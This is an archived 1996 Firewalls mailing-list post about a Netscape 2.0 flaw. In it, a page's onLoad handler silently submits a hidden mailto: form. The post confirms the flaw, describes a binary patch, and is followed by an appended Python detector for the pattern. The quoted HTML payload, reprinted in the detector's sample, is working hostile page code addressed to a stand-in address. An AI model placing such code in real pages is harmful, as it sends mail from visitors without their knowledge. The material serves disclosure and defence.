Great Circle Associates Firewalls
(March 1996)
 


Subject: RE: BoS: Netscape2.0 sends mail to the world without authority
From: Tim Linnanvirta <tim @ clinet . fi>
Date: Wed, 13 Mar 1996 18:35:26 +0200 (EET)
To: firewalls @ GreatCircle . COM


> I noticed, while loading a web page, that there was a mailto: URL active
> (using the "Easter Egg" Ctrl-Alt-T popup to see active URLs).  Sure enough,
> after I cancelled that and examined the source, I saw something like this:
> 
> <body onLoad="document.mailme.submit()">
> <form method=post name="mailme"
>       action="mailto:nasty@secret.org?subject=gotcha">
> <input type=hidden name="hi" value="there">
> </form>
> 
> A quick test on my local machine shows that this will send a message to
> nasty@secret.org with the subject gotcha and the body "hi=there".


	I tested this on SunOS 4.1.3, and it sure works: the Netscape
	onLoad function will send mail using your account name and
	without asking for confirmation or even informing you.

	I looked at the Netscape binary with od -s and emacs. The
	string "onload" (all lower case) occurs 2 times on its own,
	between null characters.  When I patched it, changing the
	first occurrence to "onxxad", the resulting binary no longer
	obeyed the "onLoad" directive and did not obey the "onxxad"
	directive either.  When I changed both occurrences of "onload"
	to "onxxoad", the resulting binary did not obey the "onLoad"
	directive, but it did obey the "onxxad" directive.

	Note that the Netscape license agreement forbids you to:

	"... * modify, translate, reverse engineer, decompile, disassemble
	       (except to the extent applicable laws specifically prohibit such
	       restriction), or create derivative works based on the Software; ..."

	So if you patch Netscape to prevent it from forging your mail, you
	might be breaking the license.  And of course this kind of binary
	patching may easily break something else.  At least it will break
	any WWW pages which use the onLoad directive for some other,
	more legitimate purpose.

	So do not do it unless you know exactly what you are doing,
	and do not blame me if it does not work or leads to a disaster!

	If you are really concerned about this thing,  consider sending 
	e-mail to Netscape Communications Corporation,  explaining to them 
	the reasons why you think Netscape should not send mail using your
	machine, address and account without asking for confirmation.

		- Tim
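A defender-side check for the pattern quoted above, added here as an example (it is not code from the post, the list, or Netscape): it parses a page and reports any form whose action is a mailto: URL and which the body's onLoad handler submits, together with the hidden fields that would become the message body. The sample page is constructed to match the snippet in the quoted message.

```python
from html.parser import HTMLParser
from urllib.parse import urlencode
import re

SUBMIT_RE = re.compile(r"document\.(\w+)\.submit\(\)")

class MailtoAutoSubmitDetector(HTMLParser):
    """Collects body onLoad submits, mailto: forms and their hidden fields."""
    def __init__(self):
        super().__init__()
        self.onload_submits = []   # form names submitted from body onLoad
        self.mailto_forms = {}     # form name -> mailto: action
        self.hidden_fields = {}    # form name -> [(name, value), ...]
        self._current_form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases keys
        if tag == "body" and "onload" in a:
            self.onload_submits += SUBMIT_RE.findall(a["onload"])
        elif tag == "form":
            self._current_form = a.get("name", "")
            if a.get("action", "").lower().startswith("mailto:"):
                self.mailto_forms[self._current_form] = a["action"]
                self.hidden_fields.setdefault(self._current_form, [])
        elif tag == "input" and self._current_form in self.mailto_forms:
            if a.get("type", "text").lower() == "hidden":
                self.hidden_fields[self._current_form].append(
                    (a.get("name", ""), a.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current_form = None

def find_silent_mailto(html):
    """Return one finding per form that is both mailto: and auto-submitted."""
    p = MailtoAutoSubmitDetector()
    p.feed(html)
    p.close()
    return [{"form": n, "action": p.mailto_forms[n],
             "body": urlencode(p.hidden_fields[n])}
            for n in p.onload_submits if n in p.mailto_forms]

# Constructed sample, modelled on the page described in the quoted message.
SAMPLE = """<html><body onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:nasty@secret.org?subject=gotcha">
<input type=hidden name="hi" value="there"></form></body></html>"""

if __name__ == "__main__":
    for f in find_silent_mailto(SAMPLE):
        print("silent mailto submit:", f)
```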

